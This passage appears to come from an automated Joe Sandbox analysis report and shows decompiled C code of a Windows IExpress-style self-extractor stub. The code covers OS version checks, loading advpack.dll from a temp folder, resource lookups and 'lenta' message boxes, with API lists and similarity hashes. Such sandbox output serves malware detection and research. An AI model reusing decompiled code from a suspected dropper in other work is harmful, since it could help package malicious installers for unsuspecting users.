								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                                                              							_t109 = _v424;
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                                                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                                                              								goto L28;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                                                              							goto L27;
                                                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                                                              							_t135 =  &(_t135[1]);
                                                                                                                                                                                                                                              							_v428 = _t135;
                                                                                                                                                                                                                                              							_v420 = _t135;
                                                                                                                                                                                                                                              							__eflags = _t135 - 2;
                                                                                                                                                                                                                                              						} while (_t135 < 2);
                                                                                                                                                                                                                                              						goto L36;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__eflags = _t77 == 1;
                                                                                                                                                                                                                                              					if(_t77 == 1) {
                                                                                                                                                                                                                                              						 *0xa89a40 = _t119;
                                                                                                                                                                                                                                              						 *0xa88184 = 1;
                                                                                                                                                                                                                                              						 *0xa88180 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - 3;
                                                                                                                                                                                                                                              						if(_t133 > 3) {
                                                                                                                                                                                                                                              							__eflags = _t133 - 5;
                                                                                                                                                                                                                                              							if(_t133 < 5) {
                                                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t113 = 3;
                                                                                                                                                                                                                                              							_t119 = _t113;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t119 = 1;
                                                                                                                                                                                                                                              						_t114 = 3;
                                                                                                                                                                                                                                              						 *0xa89a40 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0xa88184 = _t135;
                                                                                                                                                                                                                                              							 *0xa88180 = _t135;
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                              						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t138 = 0x4ca;
                                                                                                                                                                                                                                              					goto L44;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t138 = 0x4b4;
                                                                                                                                                                                                                                              					L44:
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					L65:
                                                                                                                                                                                                                                              					_t133 = _t138;
                                                                                                                                                                                                                                              					E00A844B9(0, _t138);
                                                                                                                                                                                                                                              					L66:
                                                                                                                                                                                                                                              					return E00A86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x00a838bb
                                                                                                                                                                                                                                              0x00a838c1
                                                                                                                                                                                                                                              0x00a83975
                                                                                                                                                                                                                                              0x00a838c7
                                                                                                                                                                                                                                              0x00a838de
                                                                                                                                                                                                                                              0x00a838e0
                                                                                                                                                                                                                                              0x00a838e0
                                                                                                                                                                                                                                              0x00a8397b
                                                                                                                                                                                                                                              0x00a8397d
                                                                                                                                                                                                                                              0x00a839a9
                                                                                                                                                                                                                                              0x00a8397f
                                                                                                                                                                                                                                              0x00a83982
                                                                                                                                                                                                                                              0x00a8398b
                                                                                                                                                                                                                                              0x00a8398d
                                                                                                                                                                                                                                              0x00a8398f
                                                                                                                                                                                                                                              0x00a8399f
                                                                                                                                                                                                                                              0x00a839a1
                                                                                                                                                                                                                                              0x00a83991
                                                                                                                                                                                                                                              0x00a83991
                                                                                                                                                                                                                                              0x00a83991
                                                                                                                                                                                                                                              0x00a8398f
                                                                                                                                                                                                                                              0x00a839af
                                                                                                                                                                                                                                              0x00a839b6
                                                                                                                                                                                                                                              0x00a83a0f
                                                                                                                                                                                                                                              0x00a83a0f
                                                                                                                                                                                                                                              0x00a83a11
                                                                                                                                                                                                                                              0x00a83a13
                                                                                                                                                                                                                                              0x00a83a19
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839b8
                                                                                                                                                                                                                                              0x00a839b8
                                                                                                                                                                                                                                              0x00a839ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839bc
                                                                                                                                                                                                                                              0x00a839bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839c3
                                                                                                                                                                                                                                              0x00a839c9
                                                                                                                                                                                                                                              0x00a839ce
                                                                                                                                                                                                                                              0x00a839d0
                                                                                                                                                                                                                                              0x00a839e3
                                                                                                                                                                                                                                              0x00a839e5
                                                                                                                                                                                                                                              0x00a839e6
                                                                                                                                                                                                                                              0x00a839f1
                                                                                                                                                                                                                                              0x00a839f7
                                                                                                                                                                                                                                              0x00a839fa
                                                                                                                                                                                                                                              0x00a83a01
                                                                                                                                                                                                                                              0x00a83a04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83a06
                                                                                                                                                                                                                                              0x00a83a09
                                                                                                                                                                                                                                              0x00a83a09
                                                                                                                                                                                                                                              0x00a83a0b
                                                                                                                                                                                                                                              0x00a83a0b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83a09
                                                                                                                                                                                                                                              0x00a839fc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839fc
                                                                                                                                                                                                                                              0x00a839d3
                                                                                                                                                                                                                                              0x00a839d8
                                                                                                                                                                                                                                              0x00a839da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a839dc
                                                                                                                                                                                                                                              0x00a839b6
                                                                                                                                                                                                                                              0x00a83955
                                                                                                                                                                                                                                              0x00a8395b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83961
                                                                                                                                                                                                                                              0x00a83963
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83969
                                                                                                                                                                                                                                              0x00a83969
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83969
                                                                                                                                                                                                                                              0x00a83915
                                                                                                                                                                                                                                              0x00a83915
                                                                                                                                                                                                                                              0x00a8391b
                                                                                                                                                                                                                                              0x00a8391f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8392d
                                                                                                                                                                                                                                              0x00a83933
                                                                                                                                                                                                                                              0x00a83938
                                                                                                                                                                                                                                              0x00a8393a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a83940
                                                                                                                                                                                                                                              0x00a83946
                                                                                                                                                                                                                                              0x00a8394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a838f2
                                                                                                                                                                                                                                              0x00a83843
                                                                                                                                                                                                                                              0x00a83845
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8384b
                                                                                                                                                                                                                                              0x00a8384d
                                                                                                                                                                                                                                              0x00a83883
                                                                                                                                                                                                                                              0x00a83885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A83723
• MessageBeep.USER32(00000000), ref: 00A839C3
• MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A839F1
Strings
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$lenta
• API String ID: 2519184315-4216304122
• Opcode ID: 7c8ee21dcb89fdb0ad7579014d777c299cd4d13391027b6dc821525e34d6e175
• Instruction ID: ad1c62637d39ffbe07298ce1b2376c7eb045ac26294dc5bea1436b0cca1a287a
• Opcode Fuzzy Hash: 7c8ee21dcb89fdb0ad7579014d777c299cd4d13391027b6dc821525e34d6e175
• Instruction Fuzzy Hash: 0E911472E012149FEF38EF25CD907BAB3B1EB45B40F1541A9D88AAB241DB758F81CB41
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
E00A86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __edi;
	signed int _t9;
	signed char _t14;
	struct HINSTANCE__* _t15;
	void* _t18;
	CHAR* _t26;
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0xa88004; // 0xd891196d
	_v8 = _t9 ^ _t28;
	_push(__ecx);
	E00A81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
	_t26 = "advpack.dll";
	E00A8658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	return E00A86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A864DF
                                                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A864F9
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00A86502
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                              • API String ID: 438848745-3736221019
                                                                                                                                                                                                                                              • Opcode ID: 820fb225a9d51df1fe76e7afea2aea645f5cbe083e38018706b8f2129f8531ad
                                                                                                                                                                                                                                              • Instruction ID: 2231e535ae3a12e1fd02078febd45d1df90aca3f0e0aa607d7688e11eade5145
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 820fb225a9d51df1fe76e7afea2aea645f5cbe083e38018706b8f2129f8531ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9101F470A04108ABEB54FBA4DC49EEE7778EB60311F500299F585921C0DF74AE8BCB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				char* _v12;
                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                                                                                                              				_t106 = 0;
                                                                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				_t103 = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_t106 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t62 = 0;
                                                                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                              						if(E00A82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_t99 = _v16;
                                                                                                                                                                                                                                              							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                              							_t93 = _v24;
                                                                                                                                                                                                                                              							_t87 = _v20;
                                                                                                                                                                                                                                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                              							if(_t103 != 0) {
                                                                                                                                                                                                                                              								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                              								_v36 = _t73;
                                                                                                                                                                                                                                              								if(_t73 != 0) {
                                                                                                                                                                                                                                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                              										L15:
                                                                                                                                                                                                                                              										GlobalUnlock(_t103);
                                                                                                                                                                                                                                              										_t99 = _v16;
                                                                                                                                                                                                                                              										L18:
                                                                                                                                                                                                                                              										_t87 = _t87 + 1;
                                                                                                                                                                                                                                              										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										_v20 = _t87;
                                                                                                                                                                                                                                              										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L19;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t79 = _v44;
                                                                                                                                                                                                                                              										_t88 = _t106;
                                                                                                                                                                                                                                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                              										_t101 = _v28;
                                                                                                                                                                                                                                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                              										_t97 = _v48;
                                                                                                                                                                                                                                              										_v36 = _t83;
                                                                                                                                                                                                                                              										_t109 = _t83;
                                                                                                                                                                                                                                              										do {
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                              											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                              											_t88 = _t88 + 4;
                                                                                                                                                                                                                                              										} while (_t88 < 8);
                                                                                                                                                                                                                                              										_t87 = _v20;
                                                                                                                                                                                                                                              										_t106 = 0;
                                                                                                                                                                                                                                              										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                              											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                              												GlobalUnlock(_t103);
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												goto L15;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L20:
                                                                                                                                                                                                                                              				 *_a8 = _t87;
                                                                                                                                                                                                                                              				if(_t103 != 0) {
                                                                                                                                                                                                                                              					GlobalFree(_t103);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t106;
                                                                                                                                                                                                                                              			}

































                                                                                                                                                                                                                                              0x00a82a6f
                                                                                                                                                                                                                                              0x00a82a7d

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00A82A6F
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: CharUpperA.USER32(D891196D,00000000,00000000,00000000), ref: 00A827A8
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: CharNextA.USER32(0000054D), ref: 00A827B5
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: CharNextA.USER32(00000000), ref: 00A827BC
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82829
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82852
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A82870
                                                                                                                                                                                                                                                • Part of subcall function 00A82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A828A0
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A83938,?,?,?,?,-00000005), ref: 00A82958
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 00A82969
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A83938,?,?,?,?,-00000005,?), ref: 00A82A21
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A82A81
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3949799724-0
                                                                                                                                                                                                                                              • Opcode ID: b72dafabaa30a2ce4b0be6369c1471a0d27038ec7ae1a961baea24584acc05b9
                                                                                                                                                                                                                                              • Instruction ID: 9e22cde5a4be9c4b592d94b06f89a62e76575dab8b8b4d76a2fdda8083df3c2f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b72dafabaa30a2ce4b0be6369c1471a0d27038ec7ae1a961baea24584acc05b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D511931E00219EFDB25EF98D884ABEFBB9FF48740F14416AE915E3221DB319941DB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                                                                              			E00A84169(void* __eflags) {
                                                                                                                                                                                                                                              				int _t18;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = E00A8468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                              					if(E00A8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							return LocalFree(_t21);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(0x40);
                                                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                                                              						_push(_t21);
                                                                                                                                                                                                                                              						_t18 = 0x3e9;
                                                                                                                                                                                                                                              						L6:
                                                                                                                                                                                                                                              						E00A844B9(0, _t18);
                                                                                                                                                                                                                                              						goto L7;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                                                                              					_t18 = 0x4b1;
                                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A830B4), ref: 00A84189
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A830B4), ref: 00A841E7
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                              • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                              • Opcode ID: 287a1b6bd2f413e14b2e9404791cc7d26e91ca85da3e693c05ac35c959916c70
                                                                                                                                                                                                                                              • Instruction ID: e2865f37bca4e2a8cfcb842c49a13b68461b26223a40b46cb215bbc84208229e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 287a1b6bd2f413e14b2e9404791cc7d26e91ca85da3e693c05ac35c959916c70
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B101F4B17003167BF32477A54C8AF7B659EDBE8795F004236B705E5180DA68DC024375
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v520;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				void* _t33;
